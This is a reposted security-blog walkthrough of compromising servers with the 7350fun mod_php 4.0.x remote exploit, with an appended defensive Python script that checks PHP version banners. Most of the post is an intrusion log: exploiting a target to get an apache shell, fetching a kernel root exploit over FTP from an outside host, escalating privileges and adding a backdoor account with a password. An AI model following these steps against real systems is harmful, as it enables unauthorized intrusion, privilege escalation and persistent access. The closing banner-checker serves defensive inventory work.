[Repost] Getting root with the PHP v4.0.2rc1-v4.0.7RC2 exploit program


Source: Neeao's Security Blog

I found the following tool on a hacked server:
fun
This tool is an exploit program specifically for scanning for PHP v4.0.2rc1-v4.0.7RC2. Once a target is found, the overflow gives you a remote shell, and getting root from there is even easier. Usage is as follows:

[root@linux_server tmp]# ./fun
7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
by lorian.

usage: ./fun [options]
Options:
  -c          check exploitability only, do not exploit
  -n          no check mode
  -s start    bruteforce start (top)
  -t target   choose target
              (1) PHP v4.0.2rc1-v4.0.5
              (2) PHP v4.0.6-v4.0.7RC2
In my testing, this gets you a remote shell with apache privileges.
Then a kernel overflow program gets you local root. I tested it and got root on a Redhat 7.2 server.
The method is as follows:
[bob@bob linux_server]$ ./fun -c 202.x.x.x /login.php     (verify the server's PHP version)
7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
by lorian.
+ Checking for vulnerable PHP version...
+ passed: server says PHP/4.0.6     (4.0.6 is within the attackable range)

[bob@bob linux_server]$ ./fun -t 2 202.x.x.x /login.php
7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
by lorian.
+ Checking for vulnerable PHP version...
+ passed: server says PHP/4.0.6
+ exploiting the bug now...
[+++-------] trying: bffffecc     (it starts sending the overflow code to the remote server over and over)
[++++++++
[++++++++++
[+++++++---] trying: bffffe80
[+++++++++
[++++++++++] trying: bffffde8
[+---------] trying: bffffde4
[++
[+++++++---] trying: bffffc70
[++++++++
[++++++----] trying: bffff9d4
[+++++++
[++++++++
[+++++-----] trying: bffff9a0
[++++++
[+++++++
[++++++++++] trying: bffff688
[++++++++++] trying: bffff5dc
+ done ...     (an hour and a half later, it told me it had succeeded) :P
+ you should be connected to a dup-shell now
+ if not simply try again
command>
Linux manson 2.4.7-10smp #1 SMP Thu Sep 6 17:09:31 EDT 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)     (I'm logged in remotely now)

ls     (type ls; below is the system's directory listing)
bin
boot
dev
etc
home
initrd
lib
lost+found
misc
mnt
opt
proc
root
sbin
tmp
usr
var
cd /tmp
ftp 219.x.x.x     (go fetch the kernel overflow code for 2.4.7-10)
bob
Password:buyllshit
Name (219.x.x.x:apache): Not logged in.     (damn, typed the password wrong)
Login failed.
by
ftp 219.x.x.x
bob
Password:bullshit     (right this time)
cd backdoot
Name (219.x.x.x:apache): /backdoot: No such file or directory.     (typed the directory wrong)
cd backdoor
get xp     (got the local kernel overflow program)
by
chmod +x xp     (it is in /tmp; make xp executable)
./xp
[+] Attached to 17306
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...     (overflow succeeded)
useradd bob
/bin/sh: useradd: command not found     (my PATH probably lacks /usr/sbin, so I'll just go find it)
locate useradd
/etc/default/useradd
/usr/sbin/useradd
/usr/share/man/man8/useradd.8.gz
cd /usr/sbin
./useradd bob     (bob added)
passwd bob
New password: bullshit
BAD PASSWORD: it is based on a dictionary word
Retype new password: bullshit
Changing password for user bob
passwd: all authentication tokens updated successfully     (password changed)
exit
exit
The next steps don't need repeating: use SecureCRT to ssh in with the username and password you just set, then run that xp program again and you are root.
This program is fairly old; I only came across this tool recently while looking into a compromised server.
I also found the program at http://packetstormsecurity.org.
Quite a few servers in China are still running the problematic PHP versions above, so they need to be updated urgently.
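An added example, not code from the post or from 7350fun: the version check the tool's -c mode performs ("server says PHP/4.0.6") reduced to the decision a defender can run against their own web inventory. It assumes the PHP version is advertised in the X-Powered-By header (PHP's expose_php setting) or in the Server header (Apache's ServerTokens Full); the HTTP responses in it are constructed, not captured traffic. It also handles the RC suffixes in the tool's two ranges (4.0.2rc1, 4.0.7RC2), so that 4.0.7 final, which lies outside the range, is not mistaken for 4.0.7RC2.

```python
"""Classify a PHP version banner against the two 7350fun target ranges.

Added example (not 7350fun's code). Assumptions not from the original post:
the PHP version is looked for in X-Powered-By first and then in Server;
the sample responses at the bottom are constructed.
"""
import re

PHP_TOKEN = re.compile(r"PHP/(\d+(?:\.\d+)+(?:[Rr][Cc]\d+)?)")


def parse_version(text):
    """'4.0.7RC2' -> (4, 0, 7, 0, 2); '4.0.6' -> (4, 0, 6, 1, 0).

    The fourth element is 1 for a final release and 0 for a release
    candidate, so every RC sorts before the final release with the same
    number and plain tuple comparison gives the right order.
    """
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:[Rr][Cc](\d+))?", text.strip())
    if not m:
        raise ValueError("unrecognised PHP version: %r" % text)
    major, minor, patch, rc = m.groups()
    if rc is None:
        return (int(major), int(minor), int(patch), 1, 0)
    return (int(major), int(minor), int(patch), 0, int(rc))


# The ranges exactly as printed in the tool's usage text.
# Versions between 4.0.5 and 4.0.6 final (e.g. a 4.0.6 RC) are in neither
# range, so classify() reports None for them; check such hosts by hand.
TARGETS = {
    1: (parse_version("4.0.2rc1"), parse_version("4.0.5")),
    2: (parse_version("4.0.6"), parse_version("4.0.7RC2")),
}


def classify(version_text):
    """Return the 7350fun -t target number, or None if outside both ranges."""
    v = parse_version(version_text)
    for target, (low, high) in TARGETS.items():
        if low <= v <= high:
            return target
    return None


def php_version_from_response(raw_response):
    """Pull the advertised PHP version out of a raw HTTP response, or None."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    for name in ("x-powered-by", "server"):
        m = PHP_TOKEN.search(headers.get(name, ""))
        if m:
            return m.group(1)
    return None


def check(raw_response):
    """Mirror the tool's -c result: (advertised version or None, target or None)."""
    version = php_version_from_response(raw_response)
    if version is None:
        return (None, None)
    return (version, classify(version))


# Constructed sample responses (not captured traffic).
SAMPLE_VULNERABLE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux)\r\n"
    "X-Powered-By: PHP/4.0.6\r\n"
    "Content-Type: text/html\r\n\r\n<html></html>"
)
SAMPLE_PATCHED = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/1.3.22 (Unix) PHP/4.1.2\r\n"
    "Content-Type: text/html\r\n\r\n<html></html>"
)
SAMPLE_SILENT = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Content-Type: text/html\r\n\r\n<html></html>"
)

if __name__ == "__main__":
    for label, resp in (("vulnerable", SAMPLE_VULNERABLE),
                        ("patched", SAMPLE_PATCHED),
                        ("silent", SAMPLE_SILENT)):
        version, target = check(resp)
        print("%-10s advertised=%s target=%s" % (label, version, target))
```

The banner is self-reported: a server can hide or fake it, and a distribution can backport the fix without changing the version string, so a match means "look at this host", not "exploitable", and a silent or mismatching banner does not prove the host is safe.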
